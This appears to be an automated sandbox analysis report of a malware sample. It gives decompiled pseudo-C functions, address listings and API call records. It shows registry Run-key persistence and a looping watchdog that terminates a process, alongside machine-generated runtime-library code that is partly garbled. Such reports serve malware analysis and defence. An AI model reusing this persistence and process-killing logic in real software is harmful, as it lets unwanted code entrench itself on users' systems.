				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
